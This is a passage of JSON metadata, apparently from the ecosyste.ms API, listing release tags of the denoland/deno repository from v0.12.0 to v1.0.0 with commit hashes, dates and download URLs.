td%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z